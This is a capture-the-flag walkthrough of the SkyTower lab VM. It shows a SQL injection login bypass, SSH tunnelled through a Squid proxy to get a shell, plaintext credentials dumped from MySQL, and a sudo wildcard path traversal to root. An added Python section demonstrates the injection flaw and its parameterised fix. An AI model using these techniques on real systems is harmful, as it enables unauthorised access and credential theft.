A virtual machine designed by Telspace Systems.
Enumeration
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 52
80/tcp open http syn-ack ttl 52
554/tcp open rtsp syn-ack ttl 64
3128/tcp open squid-http syn-ack ttl 52
7070/tcp open realserver syn-ack ttl 64
Let’s start with port 80:
Foothold
We can use SQLi to get into the login page:
' || 1=1#
I did try other methods; however, only the OR operator (||) gave me any luck, with the trailing # commenting out the remainder of the query.
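For the defensive side of this step, here is an added example, not code from the write-up or from the box, showing the login pattern that makes a tautology bypass like the one above possible next to its parameterised fix. It uses Python with SQLite; SQLite treats || as string concatenation and has no # comment, so the payload is spelled ' OR 1=1 -- there, with the same effect on the spliced query. The table name login is from the write-up; the column names and rows are constructed for the demo.

```python
import sqlite3

# Constructed stand-in for the box's SkyTech database: the table name `login`
# is from the write-up, the column names and rows are assumptions for the demo.
ROWS = [
    ("user1@example.test", "constructed-password-1"),
    ("user2@example.test", "constructed-password-2"),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed login table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (email TEXT NOT NULL, password TEXT NOT NULL)")
    conn.executemany("INSERT INTO login VALUES (?, ?)", ROWS)
    return conn


def login_vulnerable(conn, email, password):
    """Splice user input straight into SQL text: the pattern a tautology bypass needs."""
    query = ("SELECT email FROM login WHERE email = '%s' AND password = '%s'"
             % (email, password))
    return conn.execute(query).fetchone() is not None


def login_fixed(conn, email, password):
    """Bind user input as parameters; the driver never parses it as SQL syntax."""
    query = "SELECT email FROM login WHERE email = ? AND password = ?"
    return conn.execute(query, (email, password)).fetchone() is not None


# SQLite's spelling of the tautology: OR instead of ||, and a `--` comment
# instead of # to discard the rest of the spliced statement.
BYPASS_PAYLOAD = "' OR 1=1 --"


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", login_vulnerable(conn, BYPASS_PAYLOAD, "anything"))  # True
    print("fixed:", login_fixed(conn, BYPASS_PAYLOAD, "anything"))            # False
    print("fixed, real creds:", login_fixed(conn, *ROWS[0]))                  # True
```

The spliced query becomes SELECT email FROM login WHERE email = '' OR 1=1 --' AND password = 'anything', which returns the first row regardless of credentials; the bound version compares the whole payload against the email column as a literal and finds nothing. Since the table on this box also stores passwords in plaintext (as the mysql step later shows), hashing them with a password KDF is the other fix that limits what a database dump yields.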
User own
We can try to SSH in as the user, but we only get a message sent back to us.
In the original version, port 22 isn't even accessible, so I'm going to continue as if that were the case.
There is one other service open to us, the Squid proxy on port 3128. Let's try routing traffic through it by adding it to the proxychains ProxyList:
http 163.172.228.173 3128
We then SSH to localhost through the proxy. We still get the same message, but we can append /bin/bash to the command and get a shell:
proxychains ssh john@localhost /bin/bash
Root own
We have a few other users on the box that we can try to use for privilege escalation:
Enumerating the box a little further, such as the web directories, turns up a login.php file that contains database credentials we can use:
We need an interactive terminal, but the box doesn't give us many options. I tried sh -i to get an interactive shell, which helped a bit, but mysql still didn't work. The redirection comes from .bashrc, so we can bypass it by deleting that file:
We can then move onto our database:
mysql -u root -p
use SkyTech;
select * from login;
We get a few logins; the most interesting is sara:ihatethisjob. We can su over to sara (if you SSH in, remove .bashrc as before) and find some sudo entries:
Matching Defaults entries for sara on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sara may run the following commands on this host:
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
This is pretty easy to attack: sudo matches the argument against the wildcard as a glob, so a .. component passes through and lets us traverse out of /accounts and read the flag:
sudo /bin/cat /accounts/../root/flag.txt
We also get root's password, theskytower.